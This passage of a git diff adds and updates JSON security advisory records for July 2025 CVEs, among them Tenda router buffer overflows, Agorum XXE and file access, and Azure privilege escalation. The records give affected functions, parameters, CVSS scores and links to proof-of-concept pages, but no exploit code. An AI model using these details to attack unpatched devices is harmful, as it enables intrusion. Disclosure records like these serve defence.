"https://nvd.nist.gov/vuln/detail/CVE-2025-7795" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromP2pListFilter.md" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromP2pListFilter.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316856" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316856" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616344" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T18:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-422g-xm87-cghv/GHSA-422g-xm87-cghv.json b/advisories/unreviewed/2025/07/GHSA-422g-xm87-cghv/GHSA-422g-xm87-cghv.json index 6992118994556..beaf6d82c95c6 100644 --- a/advisories/unreviewed/2025/07/GHSA-422g-xm87-cghv/GHSA-422g-xm87-cghv.json +++ b/advisories/unreviewed/2025/07/GHSA-422g-xm87-cghv/GHSA-422g-xm87-cghv.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-45x8-4rg4-4ffp/GHSA-45x8-4rg4-4ffp.json b/advisories/unreviewed/2025/07/GHSA-45x8-4rg4-4ffp/GHSA-45x8-4rg4-4ffp.json new file mode 100644 index 0000000000000..7fcfbe1d30295 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-45x8-4rg4-4ffp/GHSA-45x8-4rg4-4ffp.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-45x8-4rg4-4ffp", + "modified": "2025-07-18T18:30:31Z", + "published": "2025-07-18T18:30:30Z", + "aliases": [ + "CVE-2025-7797" + ], + "details": "A vulnerability was found in GPAC up to 2.4. It has been rated as problematic. Affected by this issue is the function gf_dash_download_init_segment of the file src/media_tools/dash_client.c. The manipulation of the argument base_init_url leads to null pointer dereference. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 153ea314b6b053db17164f8bc3c7e1e460938eaa. It is recommended to apply a patch to fix this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7797" + }, + { + "type": "WEB", + "url": "https://github.com/gpac/gpac/commit/153ea314b6b053db17164f8bc3c7e1e460938eaa" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1Z-C6RajpZ40ujo1iGNt3_mG855mPbs1Q/view?usp=share_link" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316862" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316862" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616664" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T18:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-565h-44m8-4c2v/GHSA-565h-44m8-4c2v.json b/advisories/unreviewed/2025/07/GHSA-565h-44m8-4c2v/GHSA-565h-44m8-4c2v.json new file mode 100644 index 0000000000000..fd09d29cb67c0 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-565h-44m8-4c2v/GHSA-565h-44m8-4c2v.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-565h-44m8-4c2v", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-7789" + ], + "details": "A vulnerability was found in Xuxueli xxl-job up to 3.1.1 and classified as problematic. Affected by this issue is the function makeToken of the file src/main/java/com/xxl/job/admin/controller/IndexController.java of the component Token Generation. The manipulation leads to password hash with insufficient computational effort. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7789" + }, + { + "type": "WEB", + "url": "https://github.com/xuxueli/xxl-job/issues/3751" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316850" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316850" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.615760" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-65wq-rq4p-8756/GHSA-65wq-rq4p-8756.json b/advisories/unreviewed/2025/07/GHSA-65wq-rq4p-8756/GHSA-65wq-rq4p-8756.json index b8ba2f29a6fbd..67d391a9336ca 100644 --- a/advisories/unreviewed/2025/07/GHSA-65wq-rq4p-8756/GHSA-65wq-rq4p-8756.json +++ b/advisories/unreviewed/2025/07/GHSA-65wq-rq4p-8756/GHSA-65wq-rq4p-8756.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-7h6c-r5x6-jgc8/GHSA-7h6c-r5x6-jgc8.json b/advisories/unreviewed/2025/07/GHSA-7h6c-r5x6-jgc8/GHSA-7h6c-r5x6-jgc8.json new file mode 100644 index 0000000000000..a5def3780f21c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7h6c-r5x6-jgc8/GHSA-7h6c-r5x6-jgc8.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7h6c-r5x6-jgc8", + "modified": "2025-07-18T18:30:30Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-52162" + ], + "details": "agorum Software GmbH Agorum core open v11.9.2 & v11.10.1 was discovered to contain an XML External Entity (XXE) via the RSSReader endpoint. This vulnerability allows attackers to access sensitive data via providing a crafted XML input.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52162" + }, + { + "type": "WEB", + "url": "https://herolab.usd.de/security-advisories/usd-2025-0024" + }, + { + "type": "WEB", + "url": "http://agorum.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7jrr-347f-8grx/GHSA-7jrr-347f-8grx.json b/advisories/unreviewed/2025/07/GHSA-7jrr-347f-8grx/GHSA-7jrr-347f-8grx.json new file mode 100644 index 0000000000000..82ef29ca81c50 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7jrr-347f-8grx/GHSA-7jrr-347f-8grx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jrr-347f-8grx", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-49746" + ], + "details": "Improper authorization in Azure Machine Learning allows an authorized attacker to elevate privileges over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49746" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49746" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7mm5-2cmw-jqq7/GHSA-7mm5-2cmw-jqq7.json b/advisories/unreviewed/2025/07/GHSA-7mm5-2cmw-jqq7/GHSA-7mm5-2cmw-jqq7.json new file mode 100644 index 0000000000000..f3a72cab51bad --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7mm5-2cmw-jqq7/GHSA-7mm5-2cmw-jqq7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mm5-2cmw-jqq7", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-53762" + ], + "details": "Permissive list of allowed inputs in Microsoft Purview allows an authorized attacker to elevate privileges over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53762" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53762" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-183" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7xq7-6cv9-82h6/GHSA-7xq7-6cv9-82h6.json b/advisories/unreviewed/2025/07/GHSA-7xq7-6cv9-82h6/GHSA-7xq7-6cv9-82h6.json index 5b644b5a94206..45835f9d62079 100644 --- a/advisories/unreviewed/2025/07/GHSA-7xq7-6cv9-82h6/GHSA-7xq7-6cv9-82h6.json +++ b/advisories/unreviewed/2025/07/GHSA-7xq7-6cv9-82h6/GHSA-7xq7-6cv9-82h6.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-287" + "CWE-287", + "CWE-295" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-85f8-38hh-c6gj/GHSA-85f8-38hh-c6gj.json b/advisories/unreviewed/2025/07/GHSA-85f8-38hh-c6gj/GHSA-85f8-38hh-c6gj.json new file mode 100644 index 0000000000000..8b14a276d7f44 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-85f8-38hh-c6gj/GHSA-85f8-38hh-c6gj.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85f8-38hh-c6gj", + "modified": "2025-07-18T18:30:30Z", + "published": "2025-07-18T18:30:30Z", + "aliases": [ + "CVE-2025-52164" + ], + "details": "Software GmbH Agorum core open v11.9.2 & v11.10.1 was discovered to store credentials in plaintext.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52164" + }, + { + "type": "WEB", + "url": "https://herolab.usd.de/security-advisories/usd-2025-0023" + }, + { + "type": "WEB", + "url": "http://agorum.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T18:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8mh7-q3x4-gpff/GHSA-8mh7-q3x4-gpff.json b/advisories/unreviewed/2025/07/GHSA-8mh7-q3x4-gpff/GHSA-8mh7-q3x4-gpff.json new file mode 100644 index 0000000000000..fa18244958e23 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8mh7-q3x4-gpff/GHSA-8mh7-q3x4-gpff.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8mh7-q3x4-gpff", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-49747" + ], + "details": "Missing authorization in Azure Machine Learning allows an authorized attacker to elevate privileges over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49747" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49747" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9pf2-fmhc-rfj7/GHSA-9pf2-fmhc-rfj7.json b/advisories/unreviewed/2025/07/GHSA-9pf2-fmhc-rfj7/GHSA-9pf2-fmhc-rfj7.json new file mode 100644 index 0000000000000..4a84189721961 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9pf2-fmhc-rfj7/GHSA-9pf2-fmhc-rfj7.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pf2-fmhc-rfj7", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-7791" + ], + "details": "A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7791" + }, + { + "type": "WEB", + "url": "https://github.com/i-Corner/cve/issues/9" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316852" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316852" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616217" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9vjx-8m86-3rhw/GHSA-9vjx-8m86-3rhw.json b/advisories/unreviewed/2025/07/GHSA-9vjx-8m86-3rhw/GHSA-9vjx-8m86-3rhw.json index d239589747da4..eb31783a9436b 100644 --- a/advisories/unreviewed/2025/07/GHSA-9vjx-8m86-3rhw/GHSA-9vjx-8m86-3rhw.json +++ b/advisories/unreviewed/2025/07/GHSA-9vjx-8m86-3rhw/GHSA-9vjx-8m86-3rhw.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-345" + "CWE-345", + "CWE-354" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-f5qr-822f-j6gv/GHSA-f5qr-822f-j6gv.json b/advisories/unreviewed/2025/07/GHSA-f5qr-822f-j6gv/GHSA-f5qr-822f-j6gv.json new file mode 100644 index 0000000000000..ee2b96fda10e7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-f5qr-822f-j6gv/GHSA-f5qr-822f-j6gv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f5qr-822f-j6gv", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-47158" + ], + "details": "Authentication bypass by assumed-immutable data in Azure DevOps allows an unauthorized attacker to elevate privileges over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47158" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47158" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-302" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-g8fj-q2xq-wmh6/GHSA-g8fj-q2xq-wmh6.json b/advisories/unreviewed/2025/07/GHSA-g8fj-q2xq-wmh6/GHSA-g8fj-q2xq-wmh6.json index 19d738ba72ca0..a95f7951e4c56 100644 --- a/advisories/unreviewed/2025/07/GHSA-g8fj-q2xq-wmh6/GHSA-g8fj-q2xq-wmh6.json +++ b/advisories/unreviewed/2025/07/GHSA-g8fj-q2xq-wmh6/GHSA-g8fj-q2xq-wmh6.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-jx4p-33jj-p9hw/GHSA-jx4p-33jj-p9hw.json b/advisories/unreviewed/2025/07/GHSA-jx4p-33jj-p9hw/GHSA-jx4p-33jj-p9hw.json new file mode 100644 index 0000000000000..9e117a830bc9e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jx4p-33jj-p9hw/GHSA-jx4p-33jj-p9hw.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jx4p-33jj-p9hw", + "modified": "2025-07-18T18:30:31Z", + "published": "2025-07-18T18:30:30Z", + "aliases": [ + "CVE-2025-7796" + ], + "details": "A vulnerability, which was classified as critical, was found in Tenda FH451 1.0.0.9. This affects the function fromPptpUserAdd of the file /goform/PPTPDClient. The manipulation of the argument Username leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7796" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromPptpUserAdd.md" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromPptpUserAdd.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316857" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316857" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616345" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T18:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mcrv-r37f-q933/GHSA-mcrv-r37f-q933.json b/advisories/unreviewed/2025/07/GHSA-mcrv-r37f-q933/GHSA-mcrv-r37f-q933.json index 54092c55a1407..721819ae19b28 100644 --- a/advisories/unreviewed/2025/07/GHSA-mcrv-r37f-q933/GHSA-mcrv-r37f-q933.json +++ b/advisories/unreviewed/2025/07/GHSA-mcrv-r37f-q933/GHSA-mcrv-r37f-q933.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-mhfx-j9x5-v427/GHSA-mhfx-j9x5-v427.json b/advisories/unreviewed/2025/07/GHSA-mhfx-j9x5-v427/GHSA-mhfx-j9x5-v427.json new file mode 100644 index 0000000000000..8732156bf6a9a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mhfx-j9x5-v427/GHSA-mhfx-j9x5-v427.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mhfx-j9x5-v427", + "modified": "2025-07-18T18:30:30Z", + "published": "2025-07-18T18:30:30Z", + "aliases": [ + "CVE-2025-52168" + ], + "details": "Incorrect access control in the dynawebservice component of agorum Software GmbH Agorum core open v11.9.2 & v11.10.1 allows unauthenticated attackers to access arbitrary files on the system.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52168" + }, + { + "type": "WEB", + "url": "https://herolab.usd.de/security-advisories/usd-2025-0022" + }, + { + "type": "WEB", + "url": "http://agorum.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T18:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mqc3-2x97-gv87/GHSA-mqc3-2x97-gv87.json b/advisories/unreviewed/2025/07/GHSA-mqc3-2x97-gv87/GHSA-mqc3-2x97-gv87.json new file mode 100644 index 0000000000000..327c24120d8e8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mqc3-2x97-gv87/GHSA-mqc3-2x97-gv87.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqc3-2x97-gv87", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-7790" + ], + "details": "A vulnerability was found in D-Link DI-8100 16.07.26A1. It has been classified as critical. This affects an unknown part of the file /menu_nat.asp of the component HTTP Request Handler. The manipulation of the argument out_addr/in_addr/out_port/proto leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7790" + }, + { + "type": "WEB", + "url": "https://github.com/XiDP0/MyCVE/blob/main/CVE/D-Link%20DI_8100-16.07.26A1/menu_nat_asp/menu_nat_asp.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316851" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316851" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616196" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-p793-776f-vqq6/GHSA-p793-776f-vqq6.json b/advisories/unreviewed/2025/07/GHSA-p793-776f-vqq6/GHSA-p793-776f-vqq6.json index a9099ee9debde..4df48548b0520 100644 --- a/advisories/unreviewed/2025/07/GHSA-p793-776f-vqq6/GHSA-p793-776f-vqq6.json +++ b/advisories/unreviewed/2025/07/GHSA-p793-776f-vqq6/GHSA-p793-776f-vqq6.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-pfm7-x8pf-m93g/GHSA-pfm7-x8pf-m93g.json b/advisories/unreviewed/2025/07/GHSA-pfm7-x8pf-m93g/GHSA-pfm7-x8pf-m93g.json index d2903c6c1ca27..ba1e51d144ec6 100644 --- a/advisories/unreviewed/2025/07/GHSA-pfm7-x8pf-m93g/GHSA-pfm7-x8pf-m93g.json +++ b/advisories/unreviewed/2025/07/GHSA-pfm7-x8pf-m93g/GHSA-pfm7-x8pf-m93g.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-phc4-gw5x-84c2/GHSA-phc4-gw5x-84c2.json b/advisories/unreviewed/2025/07/GHSA-phc4-gw5x-84c2/GHSA-phc4-gw5x-84c2.json new file mode 100644 index 0000000000000..34d969e7c3c6e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-phc4-gw5x-84c2/GHSA-phc4-gw5x-84c2.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phc4-gw5x-84c2", + "modified": "2025-07-18T18:30:30Z", + "published": "2025-07-18T18:30:30Z", + "aliases": [ + "CVE-2025-7793" + ], + "details": "A vulnerability classified as critical has been found in Tenda FH451 1.0.0.9. Affected is the function formWebTypeLibrary of the file /goform/webtypelibrary. The manipulation of the argument webSiteId leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7793" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/formWebTypeLibrary.md" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/formWebTypeLibrary.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316854" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316854" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616317" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pr48-hfmc-f9vq/GHSA-pr48-hfmc-f9vq.json b/advisories/unreviewed/2025/07/GHSA-pr48-hfmc-f9vq/GHSA-pr48-hfmc-f9vq.json new file mode 100644 index 0000000000000..673dbe5c3148b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pr48-hfmc-f9vq/GHSA-pr48-hfmc-f9vq.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pr48-hfmc-f9vq", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-45157" + ], + "details": "Insecure permissions in Splashin iOS v2.0 allow unauthorized attackers to access location data for specific users.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45157" + }, + { + "type": "WEB", + "url": "https://carterlasalle.github.io/splashin-cve-2025/splashin-1.pdf" + }, + { + "type": "WEB", + "url": "http://splashin.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + 